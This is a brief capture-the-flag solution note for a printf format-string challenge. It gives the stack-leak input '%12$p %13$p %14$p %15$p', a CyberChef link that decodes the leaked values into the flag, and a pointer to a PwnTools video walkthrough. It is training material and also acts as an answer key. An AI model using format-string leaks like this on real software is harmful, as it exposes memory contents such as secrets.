Leak flag from the stack with printf format string vuln:

Enter: `%12$p %13$p %14$p %15$p`

https://gchq.github.io/CyberChef/#recipe=Swap_endianness(%27Hex%27,8,true)From_Hex(%27Auto%27)&input=NTQ3YjUwNTUzNzMzMzMzMTcyMzA2NjVmMzM3MzMzNjgzMzcyNjE1ZjczNzQzNDZkN2QyMTZiNjMzNDY4Nzc1Zg

Or solve with PwnTools, full video walkthrough: https://youtu.be/BekVaShD9HE